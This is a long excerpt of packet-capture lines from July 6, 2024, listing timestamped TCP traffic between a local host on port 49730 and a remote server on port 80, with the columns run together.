                                                              Jul 6, 2024 04:22:01.886858940 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.886991024 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.887001991 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.887011051 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.887022018 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.887032986 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.887034893 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.887043953 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.887058020 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.887067080 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.887073994 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.887079954 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.887090921 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.887092113 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.887101889 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.887108088 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.887121916 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.887145996 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.887171984 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.887531996 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.887550116 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.887559891 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.887571096 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.887573004 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.887582064 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.887592077 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.887602091 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.887609959 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.887614012 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.887624979 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.887634993 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.887645006 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.887645960 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.887655973 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.887665033 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.887669086 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.887686968 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.887712955 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.888117075 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.888130903 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.888140917 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.888161898 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.888168097 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.888175011 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.888186932 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.888189077 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.888206959 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.888219118 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.888225079 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.888237953 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.888248920 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.888252020 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.888261080 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.888266087 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.888273954 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.888284922 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.888295889 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.888303041 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.888940096 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.888957977 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.888967037 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.888971090 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.888977051 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.888983011 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.888995886 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.889005899 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.889015913 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.889020920 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.889031887 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.889041901 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.889045954 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.889054060 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.889064074 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.889067888 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.889075994 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.889086962 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.889097929 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.889100075 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.889111042 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.889122009 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.889122009 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.889134884 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.889142990 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.889147043 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.889158964 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.889169931 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.889175892 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.889180899 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.889215946 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.889236927 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.889925003 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.889944077 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.889952898 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.889965057 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.889970064 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.889976978 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.889986992 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.889988899 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.889997005 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.890007973 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.890017986 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.890028954 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.890029907 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.890041113 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.890052080 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.890057087 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.890062094 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.890073061 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.890079021 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.890084982 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.890095949 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.890104055 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.890113115 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.890115976 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.890125990 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.890136003 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.890146017 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.890147924 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.890177011 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.890194893 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.890702009 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.890712976 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.890723944 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.890754938 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.890786886 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.930581093 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.930634975 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.930655003 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.930669069 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.930704117 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.930809021 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.930819988 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.930829048 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.930840015 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.930849075 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.930857897 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.930876970 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.930912018 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.980072021 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.980128050 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.980150938 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.980160952 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.980195045 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.980211973 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.980303049 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.980314016 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.980324030 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.980334044 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.980345011 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.980345011 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.980376959 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.980391026 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.980490923 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.980535984 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.980544090 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.980555058 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.980566025 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.980591059 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.980616093 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.980736971 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.980746984 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.980756044 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.980765104 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.980779886 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.980784893 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.980811119 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.980837107 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.980895042 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.980905056 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.980914116 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.980923891 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.980933905 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.980942011 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.980946064 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.980957985 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.980967999 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.980969906 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.980986118 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.980987072 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.980998993 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.981008053 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.981023073 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.981050014 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.981292009 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.981302977 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.981313944 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.981339931 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.981362104 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.981528044 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.981539011 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.981548071 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.981559038 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.981569052 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.981580019 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.981585026 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.981590033 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.981601000 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.981622934 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.981651068 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.981663942 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.981672049 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.981679916 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.981683016 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.981688023 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.981695890 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.981707096 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.981717110 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.981719971 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.981729031 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.981739998 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.981746912 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.981750965 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.981766939 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.981780052 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.981806993 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.982587099 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.982598066 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.982606888 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.982616901 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.982626915 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.982635021 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.982639074 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.982656956 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.982660055 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.982671022 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.982675076 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.982681990 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.982693911 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.982697964 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.982703924 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.982714891 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.982723951 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.982726097 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.982737064 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.982744932 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.982749939 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.982760906 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.982765913 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.982772112 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.982773066 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.982783079 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.982794046 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.982803106 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.982805967 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.982832909 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.982851028 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.983517885 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.983530045 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.983539104 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.983550072 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.983558893 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.983566046 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.983573914 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.983589888 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.983596087 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.983601093 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.983612061 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.983612061 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.983622074 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.983633041 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.983639956 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.983644009 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.983654976 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.983664036 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.983666897 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.983676910 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.983685970 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.983689070 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.983700037 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.983705044 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.983711958 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.983722925 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.983728886 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.983736992 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.983751059 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.983769894 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.984390020 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.984400988 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.984410048 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.984421015 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.984431028 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.984441042 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.984441996 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.984450102 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.984477997 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.984543085 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.984554052 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.984563112 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.984574080 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.984585047 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.984586000 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.984596014 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.984600067 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.984607935 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.984617949 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.984626055 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.984627008 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.984637976 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.984647989 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.984656096 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.984659910 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.984668016 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.984673023 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.984683990 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.984711885 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.039026022 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.039067030 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.039077997 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.039096117 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.039135933 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.039170980 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.039181948 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.039191008 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.039211035 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.039220095 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.039230108 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.039246082 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.039266109 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.078521013 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.078576088 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.078603983 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.078619003 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.078649998 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.078665018 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.078695059 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.078706026 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.078715086 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.078725100 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.078732014 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.078737974 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.078751087 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.078785896 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.078905106 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.078952074 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.079076052 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.079090118 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.079099894 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.079108953 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.079118967 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.079121113 CEST4973080192.168.2.495.169.205.186
